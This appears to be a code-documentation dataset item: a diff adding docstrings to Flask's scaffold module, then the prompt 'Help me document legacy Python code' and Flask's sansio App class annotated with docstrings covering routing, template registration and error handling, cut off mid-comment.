+ """Shortcut for :meth:`route` with ``methods=["PATCH"]``.
+
+ .. versionadded:: 2.0
+ """
return self._method_route("PATCH", rule, options)
@setupmethod
def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]:
+ """Decorate a view function to register it with the given URL
+ rule and options. Calls :meth:`add_url_rule`, which has more
+ details about the implementation.
+
+ .. code-block:: python
+
+ @app.route("/")
+ def index():
+ return "Hello, World!"
+
+ See :ref:`url-route-registrations`.
+
+ The endpoint name for the route defaults to the name of the view
+ function if the ``endpoint`` parameter isn't passed.
+
+ The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` and
+ ``OPTIONS`` are added automatically.
+
+ :param rule: The URL rule string.
+ :param options: Extra options passed to the
+ :class:`~werkzeug.routing.Rule` object.
+ """
def decorator(f: T_route) -> T_route:
endpoint = options.pop("endpoint", None)
@@ -297,10 +373,82 @@ provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
+ """Register a rule for routing incoming requests and building
+ URLs. The :meth:`route` decorator is a shortcut to call this
+ with the ``view_func`` argument. These are equivalent:
+
+ .. code-block:: python
+
+ @app.route("/")
+ def index():
+ ...
+
+ .. code-block:: python
+
+ def index():
+ ...
+
+ app.add_url_rule("/", view_func=index)
+
+ See :ref:`url-route-registrations`.
+
+ The endpoint name for the route defaults to the name of the view
+ function if the ``endpoint`` parameter isn't passed. An error
+ will be raised if a function has already been registered for the
+ endpoint.
+
+ The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` is
+ always added automatically, and ``OPTIONS`` is added
+ automatically by default.
+
+ ``view_func`` does not necessarily need to be passed, but if the
+ rule should participate in routing an endpoint name must be
+ associated with a view function at some point with the
+ :meth:`endpoint` decorator.
+
+ .. code-block:: python
+
+ app.add_url_rule("/", endpoint="index")
+
+ @app.endpoint("index")
+ def index():
+ ...
+
+ If ``view_func`` has a ``required_methods`` attribute, those
+ methods are added to the passed and automatic methods. If it
+ has a ``provide_automatic_methods`` attribute, it is used as the
+ default if the parameter is not passed.
+
+ :param rule: The URL rule string.
+ :param endpoint: The endpoint name to associate with the rule
+ and view function. Used when routing and building URLs.
+ Defaults to ``view_func.__name__``.
+ :param view_func: The view function to associate with the
+ endpoint name.
+ :param provide_automatic_options: Add the ``OPTIONS`` method and
+ respond to ``OPTIONS`` requests automatically.
+ :param options: Extra options passed to the
+ :class:`~werkzeug.routing.Rule` object.
+ """
raise NotImplementedError
@setupmethod
def endpoint(self, endpoint: str) -> t.Callable[[F], F]:
+ """Decorate a view function to register it for the given
+ endpoint. Used if a rule is added without a ``view_func`` with
+ :meth:`add_url_rule`.
+
+ .. code-block:: python
+
+ app.add_url_rule("/ex", endpoint="example")
+
+ @app.endpoint("example")
+ def example():
+ ...
+
+ :param endpoint: The endpoint name to associate with the view
+ function.
+ """
def decorator(f: F) -> F:
self.view_functions[endpoint] = f
@@ -310,16 +458,83 @@
@setupmethod
def before_request(self, f: T_before_request) -> T_before_request:
+ """Register a function to run before each request.
+
+ For example, this can be used to open a database connection, or
+ to load the logged in user from the session.
+
+ .. code-block:: python
+
+ @app.before_request
+ def load_user():
+ if "user_id" in session:
+ g.user = db.session.get(session["user_id"])
+
+ The function will be called without any arguments. If it returns
+ a non-``None`` value, the value is handled as if it was the
+ return value from the view, and further request handling is
+ stopped.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ executes before every request. When used on a blueprint, this executes before
+ every request that the blueprint handles. To register with a blueprint and
+ execute before every request, use :meth:`.Blueprint.before_app_request`.
+ """
self.before_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def after_request(self, f: T_after_request) -> T_after_request:
+ """Register a function to run after each request to this object.
+
+ The function is called with the response object, and must return
+ a response object. This allows the functions to modify or
+ replace the response before it is sent.
+
+ If a function raises an exception, any remaining
+ ``after_request`` functions will not be called. Therefore, this
+ should not be used for actions that must execute, such as to
+ close resources. Use :meth:`teardown_request` for that.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ executes after every request. When used on a blueprint, this executes after
+ every request that the blueprint handles. To register with a blueprint and
+ execute after every request, use :meth:`.Blueprint.after_app_request`.
+ """
self.after_request_funcs.setdefault(None, []).append(f)
return f
@setupmethod
def teardown_request(self, f: T_teardown) -> T_teardown:
+ """Register a function to be called when the request context is
+ popped. Typically, this happens at the end of each request, but
+ contexts may be pushed manually during testing.
+
+ .. code-block:: python
+
+ with app.test_request_context():
+ ...
+
+ When the ``with`` block exits (or ``ctx.pop()`` is called), the
+ teardown functions are called just before the request context is
+ made inactive.
+
+ When a teardown function was called because of an unhandled
+ exception it will be passed an error object. If an
+ :meth:`errorhandler` is registered, it will handle the exception
+ and the teardown will not receive it.
+
+ Teardown functions must avoid raising exceptions. If they
+ execute code that might fail they must surround that code with a
+ ``try``/``except`` block and log any errors.
+
+ The return values of teardown functions are ignored.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ executes after every request. When used on a blueprint, this executes after
+ every request that the blueprint handles. To register with a blueprint and
+ execute after every request, use :meth:`.Blueprint.teardown_app_request`.
+ """
self.teardown_request_funcs.setdefault(None, []).append(f)
return f
@@ -328,6 +543,15 @@ self,
f: T_template_context_processor,
) -> T_template_context_processor:
+ """Registers a template context processor function. These functions run before
+ rendering a template. The keys of the returned dict are added as variables
+ available in the template.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ is called for every rendered template. When used on a blueprint, this is called
+ for templates rendered from the blueprint's views. To register with a blueprint
+ and affect every template, use :meth:`.Blueprint.app_context_processor`.
+ """
self.template_context_processors[None].append(f)
return f
@@ -336,11 +560,37 @@ self,
f: T_url_value_preprocessor,
) -> T_url_value_preprocessor:
+ """Register a URL value preprocessor function for all view
+ functions in the application. These functions will be called before the
+ :meth:`before_request` functions.
+
+ The function can modify the values captured from the matched url before
+ they are passed to the view. For example, this can be used to pop a
+ common language code value and place it in ``g`` rather than pass it to
+ every view.
+
+ The function is passed the endpoint name and values dict. The return
+ value is ignored.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ is called for every request. When used on a blueprint, this is called for
+ requests that the blueprint handles. To register with a blueprint and affect
+ every request, use :meth:`.Blueprint.app_url_value_preprocessor`.
+ """
self.url_value_preprocessors[None].append(f)
return f
@setupmethod
def url_defaults(self, f: T_url_defaults) -> T_url_defaults:
+ """Callback function for URL defaults for all view functions of the
+ application. It's called with the endpoint and values and should
+ update the values passed in place.
+
+ This is available on both app and blueprint objects. When used on an app, this
+ is called for every request. When used on a blueprint, this is called for
+ requests that the blueprint handles. To register with a blueprint and affect
+ every request, use :meth:`.Blueprint.app_url_defaults`.
+ """
self.url_default_functions[None].append(f)
return f
@@ -348,6 +598,39 @@ def errorhandler(
self, code_or_exception: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
+ """Register a function to handle errors by code or exception class.
+
+ A decorator that is used to register a function given an
+ error code. Example::
+
+ @app.errorhandler(404)
+ def page_not_found(error):
+ return 'This page does not exist', 404
+
+ You can also register handlers for arbitrary exceptions::
+
+ @app.errorhandler(DatabaseError)
+ def special_exception_handler(error):
+ return 'Database connection failed', 500
+
+ This is available on both app and blueprint objects. When used on an app, this
+ can handle errors from every request. When used on a blueprint, this can handle
+ errors from requests that the blueprint handles. To register with a blueprint
+ and affect every request, use :meth:`.Blueprint.app_errorhandler`.
+
+ .. versionadded:: 0.7
+ Use :meth:`register_error_handler` instead of modifying
+ :attr:`error_handler_spec` directly, for application wide error
+ handlers.
+
+ .. versionadded:: 0.7
+ One can now additionally also register custom exception types
+ that do not necessarily have to be a subclass of the
+ :class:`~werkzeug.exceptions.HTTPException` class.
+
+ :param code_or_exception: the code as integer for the handler, or
+ an arbitrary exception
+ """
def decorator(f: T_error_handler) -> T_error_handler:
self.register_error_handler(code_or_exception, f)
@@ -361,6 +644,12 @@ code_or_exception: type[Exception] | int,
f: ft.ErrorHandlerCallable,
) -> None:
+ """Alternative error attach function to the :meth:`errorhandler`
+ decorator that is more straightforward to use for non decorator
+ usage.
+
+ .. versionadded:: 0.7
+ """
exc_class, code = self._get_exc_class_and_code(code_or_exception)
self.error_handler_spec[None][code][exc_class] = f
@@ -368,6 +657,13 @@ def _get_exc_class_and_code(
exc_class_or_code: type[Exception] | int,
) -> tuple[type[Exception], int | None]:
+ """Get the exception class being handled. For HTTP status codes
+ or ``HTTPException`` subclasses, return both the exception and
+ status code.
+
+ :param exc_class_or_code: Any exception class, or an HTTP status
+ code as an integer.
+ """
exc_class: type[Exception]
if isinstance(exc_class_or_code, int):
@@ -403,11 +699,15 @@
def _endpoint_from_view_func(view_func: ft.RouteCallable) -> str:
+ """Internal helper that returns the default endpoint for a given
+ function. This always is the function name.
+ """
assert view_func is not None, "expected view func if endpoint is not provided."
return view_func.__name__
def _find_package_path(import_name: str) -> str:
+ """Find the path that contains the package or module."""
root_mod_name, _, _ = import_name.partition(".")
try:
@@ -452,6 +752,18 @@
def find_package(import_name: str) -> tuple[str | None, str]:
+ """Find the prefix that a package is installed under, and the path
+ that it would be imported from.
+
+ The prefix is the directory containing the standard directory
+ hierarchy (lib, bin, etc.). If the package is not installed to the
+ system (:attr:`sys.prefix`) or a virtualenv (``site-packages``),
+ ``None`` is returned.
+
+ The path is the entry in :attr:`sys.path` that contains the package
+ for import. If the package is not installed, it's assumed that the
+ package was imported from the current working directory.
+ """
package_path = _find_package_path(import_name)
py_prefix = os.path.abspath(sys.prefix)
@@ -477,4 +789,4 @@ return site_parent, package_path
# not installed
- return None, package_path+ return None, package_path
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sansio/scaffold.py |
Help me document legacy Python code | from __future__ import annotations
import logging
import os
import sys
import typing as t
from datetime import timedelta
from itertools import chain
from werkzeug.exceptions import Aborter
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import BadRequestKeyError
from werkzeug.routing import BuildError
from werkzeug.routing import Map
from werkzeug.routing import Rule
from werkzeug.sansio.response import Response
from werkzeug.utils import cached_property
from werkzeug.utils import redirect as _wz_redirect
from .. import typing as ft
from ..config import Config
from ..config import ConfigAttribute
from ..ctx import _AppCtxGlobals
from ..helpers import _split_blueprint_path
from ..helpers import get_debug_flag
from ..json.provider import DefaultJSONProvider
from ..json.provider import JSONProvider
from ..logging import create_logger
from ..templating import DispatchingJinjaLoader
from ..templating import Environment
from .scaffold import _endpoint_from_view_func
from .scaffold import find_package
from .scaffold import Scaffold
from .scaffold import setupmethod
if t.TYPE_CHECKING: # pragma: no cover
from werkzeug.wrappers import Response as BaseResponse
from ..testing import FlaskClient
from ..testing import FlaskCliRunner
from .blueprints import Blueprint
T_shell_context_processor = t.TypeVar(
"T_shell_context_processor", bound=ft.ShellContextProcessorCallable
)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable)
T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable)
T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable)
def _make_timedelta(value: timedelta | int | None) -> timedelta | None:
if value is None or isinstance(value, timedelta):
return value
return timedelta(seconds=value)
class App(Scaffold):
    """Base class for the application object.

    Acts as the central registry for view functions, URL rules, blueprints,
    template configuration and extension state.  It is not complete on its
    own: :meth:`create_jinja_environment` raises ``NotImplementedError``
    here and must be provided by a concrete subclass.

    Edge cases worth knowing:

    * Methods decorated with ``@setupmethod`` raise :class:`AssertionError`
      once the application has handled its first request (see
      :meth:`_check_setup_finished`).
    * An ``instance_path`` passed to ``__init__`` must be absolute,
      otherwise :class:`ValueError` is raised.
    """

    #: The class of the object assigned to :attr:`aborter`, created by
    #: :meth:`create_aborter`. That object is called by
    #: :func:`flask.abort` to raise HTTP errors, and can be
    #: called directly as well.
    #:
    #: Defaults to :class:`werkzeug.exceptions.Aborter`.
    #:
    #: .. versionadded:: 2.2
    aborter_class = Aborter

    #: The class that is used for the Jinja environment.
    #:
    #: .. versionadded:: 0.11
    jinja_environment = Environment

    #: The class that is used for the :data:`~flask.g` instance.
    #:
    #: Example use cases for a custom class:
    #:
    #: 1. Store arbitrary attributes on flask.g.
    #: 2. Add a property for lazy per-request database connectors.
    #: 3. Return None instead of AttributeError on unexpected attributes.
    #: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g.
    #:
    #: .. versionadded:: 0.10
    #: Renamed from ``request_globals_class``.
    app_ctx_globals_class = _AppCtxGlobals

    #: The class that is used for the ``config`` attribute of this app.
    #: Defaults to :class:`~flask.Config`.
    #:
    #: Example use cases for a custom class:
    #:
    #: 1. Default values for certain config options.
    #: 2. Access to config values through attributes in addition to keys.
    #:
    #: .. versionadded:: 0.11
    config_class = Config

    #: The testing flag. Set this to ``True`` to enable the test mode of
    #: Flask extensions (and in the future probably also Flask itself).
    #: For example this might activate test helpers that have an
    #: additional runtime cost which should not be enabled by default.
    #:
    #: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the
    #: default it's implicitly enabled.
    #:
    #: This attribute can also be configured from the config with the
    #: ``TESTING`` configuration key. Defaults to ``False``.
    testing = ConfigAttribute[bool]("TESTING")

    #: If a secret key is set, cryptographic components can use this to
    #: sign cookies and other things. Set this to a complex random value
    #: when you want to use the secure cookie for instance.
    #:
    #: This attribute can also be configured from the config with the
    #: :data:`SECRET_KEY` configuration key. Defaults to ``None``.
    secret_key = ConfigAttribute[str | bytes | None]("SECRET_KEY")

    #: A :class:`~datetime.timedelta` which is used to set the expiration
    #: date of a permanent session. The default is 31 days which makes a
    #: permanent session survive for roughly one month.
    #:
    #: This attribute can also be configured from the config with the
    #: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to
    #: ``timedelta(days=31)``
    permanent_session_lifetime = ConfigAttribute[timedelta](
        "PERMANENT_SESSION_LIFETIME",
        get_converter=_make_timedelta, # type: ignore[arg-type]
    )

    json_provider_class: type[JSONProvider] = DefaultJSONProvider
    """A subclass of :class:`~flask.json.provider.JSONProvider`. An
    instance is created and assigned to :attr:`app.json` when creating
    the app.

    The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses
    Python's built-in :mod:`json` library. A different provider can use
    a different JSON library.

    .. versionadded:: 2.2
    """

    #: Options that are passed to the Jinja environment in
    #: :meth:`create_jinja_environment`. Changing these options after
    #: the environment is created (accessing :attr:`jinja_env`) will
    #: have no effect.
    #:
    #: .. versionchanged:: 1.1.0
    #: This is a ``dict`` instead of an ``ImmutableDict`` to allow
    #: easier configuration.
    #:
    jinja_options: dict[str, t.Any] = {}

    #: The rule object to use for URL rules created. This is used by
    #: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`.
    #:
    #: .. versionadded:: 0.7
    url_rule_class = Rule

    #: The map object to use for storing the URL rules and routing
    #: configuration parameters. Defaults to :class:`werkzeug.routing.Map`.
    #:
    #: .. versionadded:: 1.1.0
    url_map_class = Map

    #: The :meth:`test_client` method creates an instance of this test
    #: client class. Defaults to :class:`~flask.testing.FlaskClient`.
    #:
    #: .. versionadded:: 0.7
    test_client_class: type[FlaskClient] | None = None

    #: The :class:`~click.testing.CliRunner` subclass, by default
    #: :class:`~flask.testing.FlaskCliRunner` that is used by
    #: :meth:`test_cli_runner`. Its ``__init__`` method should take a
    #: Flask app object as the first argument.
    #:
    #: .. versionadded:: 1.0
    test_cli_runner_class: type[FlaskCliRunner] | None = None

    #: Default configuration values, copied into the app's config by
    #: :meth:`make_config`. Declared here; assigned by a concrete subclass.
    default_config: dict[str, t.Any]

    #: The response class used by helpers such as :meth:`redirect`.
    #: Declared here; assigned by a concrete subclass.
    response_class: type[Response]
    def __init__(
        self,
        import_name: str,
        static_url_path: str | None = None,
        static_folder: str | os.PathLike[str] | None = "static",
        static_host: str | None = None,
        host_matching: bool = False,
        subdomain_matching: bool = False,
        template_folder: str | os.PathLike[str] | None = "templates",
        instance_path: str | None = None,
        instance_relative_config: bool = False,
        root_path: str | None = None,
    ) -> None:
        """Initialize the application registry.

        :param import_name: name of the application package or module;
            forwarded to ``Scaffold`` for resource lookup.
        :param static_url_path: forwarded to ``Scaffold``.
        :param static_folder: forwarded to ``Scaffold``.
        :param static_host: not used in this base class; presumably
            consumed by subclasses that register the static route — confirm.
        :param host_matching: enables host matching on the created
            :attr:`url_map`.
        :param subdomain_matching: stored as :attr:`subdomain_matching`.
        :param template_folder: forwarded to ``Scaffold``.
        :param instance_path: path of the instance folder. Edge cases:
            when ``None`` it is computed by :meth:`auto_find_instance_path`;
            a relative path raises :class:`ValueError`.
        :param instance_relative_config: forwarded to :meth:`make_config`
            so relative config paths resolve against the instance folder.
        :param root_path: forwarded to ``Scaffold``.
        :raises ValueError: if ``instance_path`` is given but not absolute.
        """
        super().__init__(
            import_name=import_name,
            static_folder=static_folder,
            static_url_path=static_url_path,
            template_folder=template_folder,
            root_path=root_path,
        )

        if instance_path is None:
            instance_path = self.auto_find_instance_path()
        elif not os.path.isabs(instance_path):
            raise ValueError(
                "If an instance path is provided it must be absolute."
                " A relative path was given instead."
            )

        #: Holds the path to the instance folder.
        #:
        #: .. versionadded:: 0.8
        self.instance_path = instance_path

        #: The configuration dictionary as :class:`Config`. This behaves
        #: exactly like a regular dictionary but supports additional methods
        #: to load a config from files.
        self.config = self.make_config(instance_relative_config)

        #: An instance of :attr:`aborter_class` created by
        #: :meth:`make_aborter`. This is called by :func:`flask.abort`
        #: to raise HTTP errors, and can be called directly as well.
        #:
        #: .. versionadded:: 2.2
        #: Moved from ``flask.abort``, which calls this object.
        self.aborter = self.make_aborter()

        self.json: JSONProvider = self.json_provider_class(self)
        """Provides access to JSON methods. Functions in ``flask.json``
        will call methods on this provider when the application context
        is active. Used for handling JSON requests and responses.

        An instance of :attr:`json_provider_class`. Can be customized by
        changing that attribute on a subclass, or by assigning to this
        attribute afterwards.

        The default, :class:`~flask.json.provider.DefaultJSONProvider`,
        uses Python's built-in :mod:`json` library. A different provider
        can use a different JSON library.

        .. versionadded:: 2.2
        """

        #: A list of functions that are called by
        #: :meth:`handle_url_build_error` when :meth:`.url_for` raises a
        #: :exc:`~werkzeug.routing.BuildError`. Each function is called
        #: with ``error``, ``endpoint`` and ``values``. If a function
        #: returns ``None`` or raises a ``BuildError``, it is skipped.
        #: Otherwise, its return value is returned by ``url_for``.
        #:
        #: .. versionadded:: 0.9
        self.url_build_error_handlers: list[
            t.Callable[[Exception, str, dict[str, t.Any]], str]
        ] = []

        #: A list of functions that are called when the application context
        #: is destroyed. Since the application context is also torn down
        #: if the request ends this is the place to store code that disconnects
        #: from databases.
        #:
        #: .. versionadded:: 0.9
        self.teardown_appcontext_funcs: list[ft.TeardownCallable] = []

        #: A list of shell context processor functions that should be run
        #: when a shell context is created.
        #:
        #: .. versionadded:: 0.11
        self.shell_context_processors: list[ft.ShellContextProcessorCallable] = []

        #: Maps registered blueprint names to blueprint objects. The
        #: dict retains the order the blueprints were registered in.
        #: Blueprints can be registered multiple times, this dict does
        #: not track how often they were attached.
        #:
        #: .. versionadded:: 0.7
        self.blueprints: dict[str, Blueprint] = {}

        #: a place where extensions can store application specific state. For
        #: example this is where an extension could store database engines and
        #: similar things.
        #:
        #: The key must match the name of the extension module. For example in
        #: case of a "Flask-Foo" extension in `flask_foo`, the key would be
        #: ``'foo'``.
        #:
        #: .. versionadded:: 0.7
        self.extensions: dict[str, t.Any] = {}

        #: The :class:`~werkzeug.routing.Map` for this instance. You can use
        #: this to change the routing converters after the class was created
        #: but before any routes are connected. Example::
        #:
        #:     from werkzeug.routing import BaseConverter
        #:
        #:     class ListConverter(BaseConverter):
        #:         def to_python(self, value):
        #:             return value.split(',')
        #:         def to_url(self, values):
        #:             return ','.join(super(ListConverter, self).to_url(value)
        #:                             for value in values)
        #:
        #:     app = Flask(__name__)
        #:     app.url_map.converters['list'] = ListConverter
        self.url_map = self.url_map_class(host_matching=host_matching)

        self.subdomain_matching = subdomain_matching

        # tracks internally if the application already handled at least one
        # request.
        self._got_first_request = False
def _check_setup_finished(self, f_name: str) -> None:
if self._got_first_request:
raise AssertionError(
f"The setup method '{f_name}' can no longer be called"
" on the application. It has already handled its first"
" request, any changes will not be applied"
" consistently.\n"
"Make sure all imports, decorators, functions, etc."
" needed to set up the application are done before"
" running it."
)
@cached_property
def name(self) -> str:
if self.import_name == "__main__":
fn: str | None = getattr(sys.modules["__main__"], "__file__", None)
if fn is None:
return "__main__"
return os.path.splitext(os.path.basename(fn))[0]
return self.import_name
    @cached_property
    def logger(self) -> logging.Logger:
        """A :class:`logging.Logger` for this application.

        Created lazily by ``create_logger`` on first access and then
        cached for the lifetime of the app.
        """
        return create_logger(self)
    @cached_property
    def jinja_env(self) -> Environment:
        """The Jinja environment used to load and render templates.

        Created on first access via :meth:`create_jinja_environment` and
        cached; edge case: changing :attr:`jinja_options` after the first
        access has no effect on the existing environment.
        """
        return self.create_jinja_environment()
    def create_jinja_environment(self) -> Environment:
        """Create the Jinja environment returned by :attr:`jinja_env`.

        Abstract in this base class; a concrete subclass must override it.
        Calling it here always raises :class:`NotImplementedError`.
        """
        raise NotImplementedError()
def make_config(self, instance_relative: bool = False) -> Config:
root_path = self.root_path
if instance_relative:
root_path = self.instance_path
defaults = dict(self.default_config)
defaults["DEBUG"] = get_debug_flag()
return self.config_class(root_path, defaults)
    def make_aborter(self) -> Aborter:
        """Create the object assigned to :attr:`aborter`.

        Returns a new instance of :attr:`aborter_class`; override either
        to customize how HTTP errors are raised.
        """
        return self.aborter_class()
def auto_find_instance_path(self) -> str:
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path, "instance")
return os.path.join(prefix, "var", f"{self.name}-instance")
    def create_global_jinja_loader(self) -> DispatchingJinjaLoader:
        """Create the template loader for the Jinja environment.

        Returns a ``DispatchingJinjaLoader`` bound to this application.
        """
        return DispatchingJinjaLoader(self)
def select_jinja_autoescape(self, filename: str | None) -> bool:
if filename is None:
return True
return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg"))
    @property
    def debug(self) -> bool:
        """Whether debug mode is enabled.

        Reading proxies ``self.config["DEBUG"]``; assigning writes it back.
        """
        return self.config["DEBUG"] # type: ignore[no-any-return]

    @debug.setter
    def debug(self, value: bool) -> None:
        self.config["DEBUG"] = value

        # Keep template auto-reload in sync with debug mode, but only when
        # TEMPLATES_AUTO_RELOAD was left unset (None). Note this touches
        # self.jinja_env, which creates the environment if not yet built.
        if self.config["TEMPLATES_AUTO_RELOAD"] is None:
            self.jinja_env.auto_reload = value
    @setupmethod
    def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
        """Register a blueprint on the application.

        Delegates to ``blueprint.register(self, options)``, passing the
        keyword options through as a plain dict. As a ``@setupmethod``
        this raises :class:`AssertionError` once the first request has
        been handled.
        """
        blueprint.register(self, options)
    def iter_blueprints(self) -> t.ValuesView[Blueprint]:
        """Return a view of registered blueprints in registration order.

        Edge case: this is a live dict view over :attr:`blueprints`, so it
        reflects blueprints registered after the view was obtained.
        """
        return self.blueprints.values()
    @setupmethod
    def add_url_rule(
        self,
        rule: str,
        endpoint: str | None = None,
        view_func: ft.RouteCallable | None = None,
        provide_automatic_options: bool | None = None,
        **options: t.Any,
    ) -> None:
        """Register a URL rule and, optionally, a view function for it.

        Edge cases handled here:

        * ``endpoint`` defaults to the view function's name (via
          ``_endpoint_from_view_func``) when not given.
        * Allowed methods come from ``options["methods"]``, else from a
          ``methods`` attribute on ``view_func``, else default to
          ``("GET",)``; passing a plain string raises :class:`TypeError`.
        * Methods are upper-cased and any ``required_methods`` declared on
          the view function are always added.
        * ``OPTIONS`` is added automatically unless it is already listed,
          the view function sets ``provide_automatic_options``, or the
          ``PROVIDE_AUTOMATIC_OPTIONS`` config value disables it.
        * Registering a *different* function under an existing endpoint
          raises :class:`AssertionError`; re-registering the same function
          is allowed.
        """
        if endpoint is None:
            endpoint = _endpoint_from_view_func(view_func) # type: ignore

        options["endpoint"] = endpoint
        methods = options.pop("methods", None)

        # if the methods are not given and the view_func object knows its
        # methods we can use that instead. If neither exists, we go with
        # a tuple of only ``GET`` as default.
        if methods is None:
            methods = getattr(view_func, "methods", None) or ("GET",)

        if isinstance(methods, str):
            raise TypeError(
                "Allowed methods must be a list of strings, for"
                ' example: @app.route(..., methods=["POST"])'
            )

        methods = {item.upper() for item in methods}

        # Methods that should always be added
        required_methods: set[str] = set(getattr(view_func, "required_methods", ()))

        if provide_automatic_options is None:
            provide_automatic_options = getattr(
                view_func, "provide_automatic_options", None
            )

        if provide_automatic_options is None:
            provide_automatic_options = (
                "OPTIONS" not in methods
                and self.config["PROVIDE_AUTOMATIC_OPTIONS"]
            )

        if provide_automatic_options:
            required_methods.add("OPTIONS")

        # Add the required methods now.
        methods |= required_methods

        rule_obj = self.url_rule_class(rule, methods=methods, **options)
        rule_obj.provide_automatic_options = provide_automatic_options # type: ignore[attr-defined]

        self.url_map.add(rule_obj)

        if view_func is not None:
            old_func = self.view_functions.get(endpoint)

            if old_func is not None and old_func != view_func:
                raise AssertionError(
                    "View function mapping is overwriting an existing"
                    f" endpoint function: {endpoint}"
                )

            self.view_functions[endpoint] = view_func
    @t.overload
    def template_filter(self, name: T_template_filter) -> T_template_filter: ...
    @t.overload
    def template_filter(
        self, name: str | None = None
    ) -> t.Callable[[T_template_filter], T_template_filter]: ...
    @setupmethod
    def template_filter(
        self, name: T_template_filter | str | None = None
    ) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
        """Decorator registering a function as a Jinja filter.

        Edge case: usable with or without parentheses. When ``name`` is
        callable, the decorator was applied bare and the function is
        registered under its own name and returned unchanged; otherwise a
        decorator is returned that registers under ``name`` (or the
        function's name when ``name`` is ``None``).
        """
        if callable(name):
            self.add_template_filter(name)
            return name

        def decorator(f: T_template_filter) -> T_template_filter:
            self.add_template_filter(f, name=name)
            return f

        return decorator
    @setupmethod
    def add_template_filter(
        self, f: ft.TemplateFilterCallable, name: str | None = None
    ) -> None:
        """Register ``f`` as a Jinja filter under ``name``.

        Edge case: an empty-string ``name`` is falsy and therefore falls
        back to ``f.__name__``, just like ``None``.
        """
        self.jinja_env.filters[name or f.__name__] = f
    @t.overload
    def template_test(self, name: T_template_test) -> T_template_test: ...
    @t.overload
    def template_test(
        self, name: str | None = None
    ) -> t.Callable[[T_template_test], T_template_test]: ...
    @setupmethod
    def template_test(
        self, name: T_template_test | str | None = None
    ) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
        """Decorator registering a function as a Jinja test.

        Edge case: usable with or without parentheses. When ``name`` is
        callable, the decorator was applied bare and the function is
        registered under its own name and returned unchanged; otherwise a
        decorator is returned that registers under ``name`` (or the
        function's name when ``name`` is ``None``).
        """
        if callable(name):
            self.add_template_test(name)
            return name

        def decorator(f: T_template_test) -> T_template_test:
            self.add_template_test(f, name=name)
            return f

        return decorator
    @setupmethod
    def add_template_test(
        self, f: ft.TemplateTestCallable, name: str | None = None
    ) -> None:
        """Register ``f`` as a Jinja test under ``name``.

        Edge case: an empty-string ``name`` is falsy and therefore falls
        back to ``f.__name__``, just like ``None``.
        """
        self.jinja_env.tests[name or f.__name__] = f
    @t.overload
    def template_global(self, name: T_template_global) -> T_template_global: ...
    @t.overload
    def template_global(
        self, name: str | None = None
    ) -> t.Callable[[T_template_global], T_template_global]: ...
    @setupmethod
    def template_global(
        self, name: T_template_global | str | None = None
    ) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
        """Decorator registering a function as a Jinja global.

        Edge case: usable with or without parentheses. When ``name`` is
        callable, the decorator was applied bare and the function is
        registered under its own name and returned unchanged; otherwise a
        decorator is returned that registers under ``name`` (or the
        function's name when ``name`` is ``None``).
        """
        if callable(name):
            self.add_template_global(name)
            return name

        def decorator(f: T_template_global) -> T_template_global:
            self.add_template_global(f, name=name)
            return f

        return decorator
    @setupmethod
    def add_template_global(
        self, f: ft.TemplateGlobalCallable, name: str | None = None
    ) -> None:
        """Register ``f`` as a Jinja global under ``name``.

        Edge case: an empty-string ``name`` is falsy and therefore falls
        back to ``f.__name__``, just like ``None``.
        """
        self.jinja_env.globals[name or f.__name__] = f
    @setupmethod
    def teardown_appcontext(self, f: T_teardown) -> T_teardown:
        """Register ``f`` to run when the application context is popped.

        Appends to :attr:`teardown_appcontext_funcs` and returns ``f``
        unchanged so it can be used as a decorator.
        """
        self.teardown_appcontext_funcs.append(f)
        return f
    @setupmethod
    def shell_context_processor(
        self, f: T_shell_context_processor
    ) -> T_shell_context_processor:
        """Register ``f`` as a shell context processor.

        Appends to :attr:`shell_context_processors` and returns ``f``
        unchanged so it can be used as a decorator.
        """
        self.shell_context_processors.append(f)
        return f
    def _find_error_handler(
        self, e: Exception, blueprints: list[str]
    ) -> ft.ErrorHandlerCallable | None:
        """Return the most specific registered handler for ``e``, or ``None``.

        Search order: handlers keyed by the exception's HTTP status code
        before generic (``None``-code) handlers; within each, the given
        ``blueprints`` (in order) before app-level (``None``) handlers;
        within each handler map, the exception's MRO from most to least
        specific class. Edge case: when the exception has no HTTP code,
        only the ``None``-code maps are searched.
        """
        exc_class, code = self._get_exc_class_and_code(type(e))
        names = (*blueprints, None)

        for c in (code, None) if code is not None else (None,):
            for name in names:
                handler_map = self.error_handler_spec[name][c]

                if not handler_map:
                    continue

                for cls in exc_class.__mro__:
                    handler = handler_map.get(cls)

                    if handler is not None:
                        return handler

        return None
def trap_http_exception(self, e: Exception) -> bool:
if self.config["TRAP_HTTP_EXCEPTIONS"]:
return True
trap_bad_request = self.config["TRAP_BAD_REQUEST_ERRORS"]
# if unset, trap key errors in debug mode
if (
trap_bad_request is None
and self.debug
and isinstance(e, BadRequestKeyError)
):
return True
if trap_bad_request:
return isinstance(e, BadRequest)
return False
    # NOTE(review): annotated ``None`` — presumably so type checkers flag
